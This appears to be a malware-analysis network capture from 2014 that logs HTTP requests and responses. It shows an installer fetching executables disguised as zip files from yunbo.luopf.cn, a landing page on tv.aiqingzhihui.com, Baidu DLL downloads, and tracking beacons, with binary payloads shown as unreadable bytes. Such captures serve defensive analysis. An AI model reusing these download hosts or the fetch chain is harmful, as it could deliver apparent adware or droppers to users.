User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:54 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 5950288<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127215<br>

Content-Range: bytes 20054016-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>.. ....5.Z{.8......D...r.Q{..?,.W!...h..r....5X..p.....6.3.n..i$..IE.^<br>..f..e.UX......X...:. ..X..|..IA......O.....U.h7.rB&.......p.g?..0.x.K<br>.oY.....2.r.,3.M.s....|&[......4...'"....n..w"!=.....X.2....H......^..<br>m.U......P_!k...I..".yr.....i..uJ.9.FU......E..B,..e.r.[[email protected]>sa<br>,*...>...p.%.6..f.b...S.8.......d.-.0_mJ.\.......w.:}<1...L..?!H<br>Pdo..)...........67..Rv.....A..~..u..... }'......Y..n..;...\I>\....<br>I"p[n..`..R.!S...b.4...(..V...z.}/c.Fw6#.}....75Y.%.O9q..v.......Mh.~.<br>..*.&.........l...#.a...} .TT.I. ^I?..Kv..c .B..{.....J..Z.{..B8...&.h<br>.|........xR&.......N..M..B].'.........\\a.D.h..../uy.....W..O..u.J.}.<br>.H.......a`.\@.}G.U..({.O.?.k.....b.<....&.. .:..M.HR..3.QR.Z...d..<br>9.%..{Pk)..]..Z.3............mX...Q....cY..Z....T...p..'6.....n.!.U...<br>.-.?#..}..QCw}......e.K...K.w.;.0i......#~_...H..h.3.=...8.....a...<<br>;J..`.k-BPj......W.g!DU..>[{.<aF.M;N.s..u.mo...w..L3........t.G.<br>S.....[.......1..F..`w....r....t.HU.#.?.._.6..6*...!...Q.,...?..`>.<br>"..>.-SO.,m.|...5-X ..!.:..z`[email protected]...>[email protected].~.}GNU...<br> ig.&.=}Cj..O.Wt.....1~..#.......*.....T\..%....{.k....3.V..I\..v...{.<br>D........}.T-'\...N..]......*Z.!...o..o.A ....CR...l..lu..Z....w......<br>T..X......).3.%..:.4.....lx....L....>H..T.N.6.`u{M.....b*.....TP.A@<br>....Z.f.f.....5.T.1gUb..<...... ..q~..z...Xh...U....fi.Y'.[G....S..<br>.....y.t....c;......n.A'.5;...v2....,..')...~...8.p.Vp:....?....J...d.<br>.hY.D...<#.0.>.........M?Re&t..va....>0~...Y.E...Og[s.I.[d...<br>.(.....A.>"-...d./Q]...z0.)....GX?.^e/yi..2....6...._%b.r...J..</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-shadu/client/dllv3/BDMReport.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=327680-<br>

Referer: hXXp://xf.baidu.com<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:31 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 879840<br>

Connection: close<br>

ETag: 30cbc602ada7cdfb0346038c05996d84<br>

Last-Modified: Thu, 20 Jun 2013 06:27:51 GMT<br>

Expires: Mon, 18 Aug 2014 14:59:38 GMT<br>

Age: 127253<br>

Content-Range: bytes 327680-1207519/1207520<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: 21BEDF37C0B754EE14FE2C8B0543B5C0<br>

x-bs-request-id: MTAuNTguMzQuMTk6ODA4MDoxMzEyMjA1MTYxOjI4L0p1bC8yMDE0IDIyOjU5OjA1IA==<br>

x-bs-meta-crc32: 2965621797<br>

Content-MD5: 30cbc602ada7cdfb0346038c05996d84<br>

x-bs-client-ip: MTgwLjc2LjIyLjExNQ==<br><pre>.......C._^[....Q.T$...$...$P.D$.R.T$.Q.L$.PQR..................Q.T$..<br>.$...$P.D$.R.T$.Q.L$.PQR..................j.h9...d.....P...V..v..3.P.D<br>$.d......t$ .D$$.L$(3..T$..F......V..t$..V.VQP.T$$.D$.......^........L<br>$.d......Y^[email protected][email protected]$.j.j..F..<br>....F.....P...F....:....^...............j.h....d.....P..\SUVW..v..3.P.<br>D$pd........s,.........$....P.k0U.,...........D$x...........t....r....<br>.$.....G..H..L$......9D$........G....x..r..P..T$.......D$..D$.P...S...<br>.........ueh....h....j..L$,..HTTP/1.1 206 Partial Content..Server: JSP<br>3/2.0.0-b..Date: Sun, 17 Aug 2014 02:20:31 GMT..Content-Type: applicat<br>ion/x-msdownload..Content-Length: 879840..Connection: close..ETag: 30c<br>bc602ada7cdfb0346038c05996d84..Last-Modified: Thu, 20 Jun 2013 06:27:5<br>1 GMT..Expires: Mon, 18 Aug 2014 14:59:38 GMT..Age: 127253..Content-Ra<br>nge: bytes 327680-1207519/1207520..Access-Control-Allow-Origin: *..Acc<br>ess-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE..Acce<br>ss-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pc<br>s-request-id..Access-Control-Allow-Headers: Range, Origin, Content-Typ<br>e, Accept, Content-Length..Accept-Ranges: bytes..x-bs-version: 21BEDF3<br>7C0B754EE14FE2C8B0543B5C0..x-bs-request-id: MTAuNTguMzQuMTk6ODA4MDoxMz<br>EyMjA1MTYxOjI4L0p1bC8yMDE0IDIyOjU5OjA1IA==..x-bs-meta-crc32: 296562179<br>7..Content-MD5: 30cbc602ada7cdfb0346038c05996d84..x-bs-client-ip: MTgw<br>Ljc2LjIyLjExNQ==.........C._^[....Q.T$...$...$P.D$.R.T$.Q.L$.PQR......<br>............Q.T$...$...$P.D$.R.T$.Q.L$.PQR..................j.h9..</pre><<< skipped >>></font><br><br

<font color="red">GET /zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go= HTTP/1.1<br>

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>

Accept-Language: en-us<br>

Accept-Encoding: gzip, deflate<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

Host: tv.aiqingzhihui.com<br>

Connection: Keep-Alive<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Date: Sun, 17 Aug 2014 02:21:21 GMT<br>

Content-Length: 1350<br>

Content-Type: text/html<br>

Last-Modified: Tue, 17 Jun 2014 13:01:31 GMT<br>

Connection: Keep-Alive<br>

ETag: "66d7a7422c8acf1:63d"<br>

Accept-Ranges: bytes<br>

Server: Microsoft-IIS/6.0<br>

X-Powered-By: ASP.NET<br>

Fw-Via: MISS from CTL_JS_020_025.fcd<br><pre><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt<br>p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm<br>lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq<br>uiv="Content-Type" content="text/html; charset=gb2312" />..<titl<br>e></title>..<style>..body{background:#000000; overflow-<br>x:hidden; overflow-y:hidden; margin:0; padding:0; border:1px;TEXT-ALIG<br>N: center;}..html { overflow-x: hidden; overflow-y: hidden; }..</st<br>yle>..</head>..<body scroll="no">..<div style="width<br>:1024px;height:550px;margin:0 auto;overflow-x:hidden; overflow-y:hidde<br>n;">..<div style="position:absolute; top:0;margin:0 auto;display<br>:none" id="gg70"><iframe name='ip' id='ip' src="" frameborder="0<br>" width=1012 height=550></iframe></div>..<div id="fe<br>ng-yun-mini-wrap" style="width:1010px;MARGIN-RIGHT: auto; MARGIN-LEFT:<br> auto;">..<a id="loading-info" href="hXXp://VVV.fengyunzhibo.com<br>" target="_blank">...........................</a>            <br>        ..</div>..<script type="text/javascript">window.fe<br>ngyunminicongf={tuiguangid:"aiqingzhihui",width:1010,height:550}</s<br>cript>..<script type="text/javascript" src="hXXp://static.m0dlcd<br>n.kukuplay.com/support/mini/fyminiloader-min.js"></script>..&<br>lt;/div>..<div style="display:none"><script src="hXXp://s6<br>.cnzz.com/stat.php?id=2701879&web_id=2701879" language="JavaScript"><br>;</script></div>..</body>..</html>....</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=950272-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Wed, 27 Aug 2014 23:18:00 GMT<br>

Date: Mon, 28 Jul 2014 23:18:00 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 950272-1178447/1178448<br>

Content-Length: 228176<br>

Age: 1652555<br>

Via: 1.0 wzpy201:80 (Cdn Cache Server V2.0), 1.0 shiben9:8888 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMNet.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre></pre></font><br><br

<font color="red">GET /pczh_107_306.zip HTTP/1.0<br>

Host: yunbo.luopf.cn<br>

User-Agent: NSISDL/1.2 (Mozilla)<br>

Accept: */*<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Content-Length: 415552<br>

Content-Type: application/x-zip-compressed<br>

Last-Modified: Sun, 13 Jul 2014 03:35:27 GMT<br>

Accept-Ranges: bytes<br>

ETag: "f81e17d4b9ecf1:32d"<br>

Server: Microsoft-IIS/6.0<br>

Date: Sun, 17 Aug 2014 02:20:30 GMT<br>

Connection: close<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$.......B.e|.../.../<br>.../.../.../..T/.../..V/.../.../.../R.;/.../e.!/.../.../.../..Q/.../Ri<br>ch.../........................PE..L......N.................t..........<br>.>............@..........................@.........................<br>.................................pp...................................<br>......................................................................<br>..text....s.......t.................. ..`.rdata..Z............x.......<br>.......@[email protected][email protected]...`...`.....<br>......................rsrc...pp.......r..................@..@.........<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>...............................................U....\.}..t .}.F.E.u..H<br>....._B..H.P.u..u..u...\[email protected]._B..E.WP.u...`[email protected]...<br>d.@..}[email protected]... M.......M....3.....FQ.....NU..M..<br>........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...h.@<br>..u....E..9}[email protected].}[email protected]<br>[email protected][email protected] [email protected].@._<br>^3.[.....L$..(_B...Si.....VW.T.....tO.q.3.;5,_B.sB..i......D.......t.G<br>.....t...O..t .....u...3....3...F.....;5,_B.r._^[...U..QQ.U.SV..i.</pre><<< skipped >>></font><br><br

<font color="red">GET /mini/fymini.htm?f=aiqingzhihui&code=null HTTP/1.1<br>

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>

Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=<br>

Accept-Language: en-us<br>

Accept-Encoding: gzip, deflate<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

Host: mini.fengyunzhibo.com<br>

Connection: Keep-Alive<br>

<br>

</font><br><font color="blue">HTTP/1.1 302 Moved Temporarily<br>

Date: Sun, 17 Aug 2014 02:21:19 GMT<br>

Content-Type: text/html;charset=ISO-8859-1<br>

Content-Length: 177<br>

Connection: keep-alive<br>

Location: hXXp://VVV.fengyunzhibo.com<br>

Content-Language: en-US<br>

Accept-Ranges: bytes<br>

Age: 0<br>

X-Cache: miss<br>

Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs<br><pre><html>..<head><title>Document moved</title><<br>;/head>..<body><h1>Document moved</h1>..This docu<br>ment has moved <a href="hXXp://VVV.fengyunzhibo.com">here</a&<br>gt;.<p>..</body>..</html>..HTTP/1.1 302 Moved Tempor<br>arily..Date: Sun, 17 Aug 2014 02:21:19 GMT..Content-Type: text/html;ch<br>arset=ISO-8859-1..Content-Length: 177..Connection: keep-alive..Locatio<br>n: hXXp://VVV.fengyunzhibo.com..Content-Language: en-US..Accept-Ranges<br>: bytes..Age: 0..X-Cache: miss..Server: eJxLz8/XS8/RNzUuT0/1BgAfuARs..<br><html>..<head><title>Document moved</title><<br>;/head>..<body><h1>Document moved</h1>..This docu<br>ment has moved <a href="hXXp://VVV.fengyunzhibo.com">here</a&<br>gt;.<p>..</body>..</html>....</pre></font><br><br

<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=819200-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Tue, 09 Sep 2014 15:52:24 GMT<br>

Date: Sun, 10 Aug 2014 15:52:24 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 819200-1178447/1178448<br>

Content-Length: 359248<br>

Age: 556090<br>

Via: 1.0 sdytwt89:8104 (Cdn Cache Server V2.0), 1.0 tswt88:8080 (Cdn Cache Server V2.0), 1.0 jg11:51020 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMNet.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>.E.P.g.....E.P.._....E.P.......E.P..]....E......P.._....M............P<br>..\....T$..B..J.3..}.........wC.................P.._.........P.'>..<br>..E.P.......E.P.#_....E.P..\....E.P.__....E.P..=....M.......E.P.......<br>E.P..^....E.P._.....M..f.........P.:\....T$..B..J.3.............B.....<br>.................P..^.........P.w=....E.P.-.....E.P.s^....E.P..[....E.<br>P..^....E.P.E=....M.......E.P.......E.P.9^....E.P._.....M............P<br>..[....T$..B..J.3.."....0.....B.................E.P.......M..n....E...<br>.P.......T$..B..J.3.......l.....A.........E.P.......E......P..<....<br>T$..B..J.3.............A...............E.P.W.....E......P..]....T$..B.<br>.J.3..`.........ZA...............E.P.......T$..B..J.3../.........)A...<br>...........E.P.......T$....J.3.......,[email protected]<br>....P.......T$..B..J.3.......`[email protected]$..B.<br>[email protected]$..B..J.3..a.........[@.......<br>.........M.......M.......M.......M.......M.......M...................$<br>..........\[email protected]$....<br>.........3..........J.3.......P.....?......................T$..B..J.3.<br>.{....|....u?..........M.......T$..B..J.3..Q.........K?...............<br>.E.P.......E.......T$..B..J.3.............?......E...........e...M...X<br>.5.....M......?...M.......M......`...T$..B..J.3.......\.....>......<br>........M......?...M..........T$..B..J.3............}>.............<br>.....E...........e...M...T.......M......A...M..........T$..B..J.3..'..<br>.......!>......M........,....=K...M...E....h..........h........</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=950272-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Tue, 09 Sep 2014 15:52:24 GMT<br>

Date: Sun, 10 Aug 2014 15:52:24 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 950272-1178447/1178448<br>

Content-Length: 228176<br>

Age: 556091<br>

Via: 1.0 sdytwt89:8104 (Cdn Cache Server V2.0), 1.0 tswt88:8080 (Cdn Cache Server V2.0), 1.0 jg11:51020 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMNet.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre></pre></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:38 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 26004304<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127199<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$........h.M]...]...<br>].......Y...z...C...z...7...z...........^.......H...].......z.......z.<br>..\...z...\...]...\...z...\...Rich]...........PE..L......S...........!<br>......... ......................................................X.....<br>..............................M............ ...X..............P.......<br> _..................................X...@.............................<br>...............text............................... ..`.rdata..].......<br>....................@[email protected][email protected].<br>...X... ...`..................@[email protected]..............<br>@..B..................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>..................................................................</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=22151168-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:21:18 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 3853136<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127239<br>

Content-Range: bytes 22151168-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>y.R.,I.........<o.* ...M..........G..uO.....(..;.....7.....{..P..q.<br>..`.g.....^S......../B..:.=.W.|....U.p.!.51M(.."....b.E..4..M.8....h..<br>....4..(....C[..........q..2...F...*@%.K..Y>s.[.;..L...I.{_......k.<br>.z...oad..-EKdX5..wM...L=v?3O/Es.........\N...a.\S.4R.....L..e....2...<br>.>..=...)~].j.{#cs....Lk...1.a..#i..V../..D.....C$ a).;.4..J.C.....<br>.0...-_....w..........5..{.b.A.Qh>H..f...B..r...W.K...n......Q...}.<br>$.Y.HH....r....V>..v...O7.... ...p...p2.....7Eb.3......H.t.t.(....v<br>.....E. [email protected],....{....j._M...T.H...6..!.....0.....}u.K.....6....<br>..0/.}....k.....w.....H......{...;.x#..SQV....D....,....(.t..D...v..e.<br>.<r]y.........[ .9G..S....u*..=n..$..k).k.........r.....#....E.....<br>....`l..};V........~.j......\...8W.W.......2>......y....2.~...?..DM<br>.s.h.FJP.#..lL.2...M_O....n.S.K..nD..@...:......H..... K.@.(.......z..<br>h.e.p...!.}k.b..#[email protected].<^........A.....qo...1o..<br>f...o...7.V<.(._J-.7B.....Z.......zK...~*..\.ga.S ...V..K.......8P.<br>..0..0^........l.e.Z.5..0.u.....a....RP^.a.B.......I)........:..k.N\.\<br>...*..0z.hU..?.Y...b. .c..N.$.q..:...0..o.%....ZC@.. &*.\.RP..7w......<br>h..DPMs.H...{.Wt._i.k^0...w...4.IeS.E!...........E>A......W[...g._)<br>$R...h....]}../.bC.5...e b.RjN...}.R...f<a.2L.......t.~a.8...|.$k..<br>..YT........#....?...a../?..........Y?..{...p{....eM.y0oD...V.' .k7v|.<br>.....5......?.O...|...<oH..4."$h..?R...q.b......i..`G.?#....(.&..r.<br>w...B.../.9.[......[*.86GXZ.>... /.`;:sg!......q.|.a.._Z.w..7. ..S.<br>.2..82o.j..<...`......X/R..'.......DG.......X...)..x.:1.../....</pre><<< skipped >>></font><br><br

<font color="red">GET /guagua_77150006814.zip HTTP/1.0<br>

Host: yunbo.luopf.cn<br>

User-Agent: NSISDL/1.2 (Mozilla)<br>

Accept: */*<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Content-Length: 921448<br>

Content-Type: application/x-zip-compressed<br>

Last-Modified: Thu, 24 Jul 2014 04:31:48 GMT<br>

Accept-Ranges: bytes<br>

ETag: "76aed22ef8a6cf1:32d"<br>

Server: Microsoft-IIS/6.0<br>

Date: Sun, 17 Aug 2014 02:20:17 GMT<br>

Connection: close<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$........J... ... ..<br>. ...#... ..j#... ....... ...#... ..j#... ... ...)...'... ...'..J ...'<br>..r ... ... ...'... ..Rich. ..................PE..L....}.S............<br>[email protected].............@..........................@............<br>[email protected].......<br>........................................H.......................@.....<br>...............text...s........................... ..`.rdata...D......<br>.P..................@[email protected][email protected].<br>..xb.......p..................@..@....................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>..................................................................</pre><<< skipped >>></font><br><br

<font color="red">GET /9.gif?abc=1&rnd=135011660 HTTP/1.1<br>

Accept: */*<br>

Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=<br>

Accept-Language: en-us<br>

Accept-Encoding: gzip, deflate<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

Host: cnzz.mmstat.com<br>

Connection: Keep-Alive<br>

<br>

</font><br><font color="blue">HTTP/1.1 302 Found<br>

Server: Tengine<br>

Date: Sun, 17 Aug 2014 02:21:26 GMT<br>

Content-Type: image/gif<br>

Content-Length: 43<br>

Connection: keep-alive<br>

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"<br>

Set-Cookie: cna=pv92DG xUBsCAcGK9OdTDULL; expires=Wed, 14-Aug-24 02:21:26 GMT; path=/; domain=.mmstat.com<br>

Set-Cookie: sca=c4e7e74b; path=/; domain=.cnzz.mmstat.com<br>

Set-Cookie: atpsida=a967ae7461eeb242201dd034_1408242086; expires=Wed, 14-Aug-24 02:21:26 GMT; path=/; domain=.cnzz.mmstat.com<br>

Location: hXXp://pcookie.cnzz.com/app.gif?&cna=pv92DG xUBsCAcGK9OdTDULL<br>

Expires: Thu, 01 Jan 1970 00:00:01 GMT<br>

Cache-Control: no-cache<br>

Pragma: no-cache<br><pre>GIF89a.............!.......,...........L..;HTTP/1.1 302 Found..Server:<br> Tengine..Date: Sun, 17 Aug 2014 02:21:26 GMT..Content-Type: image/gif<br>..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CUR<br>a ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=pv92DG xUB<br>sCAcGK9OdTDULL; expires=Wed, 14-Aug-24 02:21:26 GMT; path=/; domain=.m<br>mstat.com..Set-Cookie: sca=c4e7e74b; path=/; domain=.cnzz.mmstat.com..<br>Set-Cookie: atpsida=a967ae7461eeb242201dd034_1408242086; expires=Wed, <br>14-Aug-24 02:21:26 GMT; path=/; domain=.cnzz.mmstat.com..Location: htt<br>p://pcookie.cnzz.com/app.gif?&cna=pv92DG xUBsCAcGK9OdTDULL..Expires: T<br>hu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cach<br>e..GIF89a.............!.......,...........L..;..</pre></font><br><br

<font color="red">GET /tg_pic/1.png HTTP/1.1<br>

Accept: */*<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>

Host: img001.com<br>

Cache-Control: no-cache<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: nginx<br>

Date: Sun, 17 Aug 2014 02:25:32 GMT<br>

Content-Type: image/png<br>

Content-Length: 135179<br>

Last-Modified: Mon, 23 Dec 2013 03:08:13 GMT<br>

Connection: keep-alive<br>

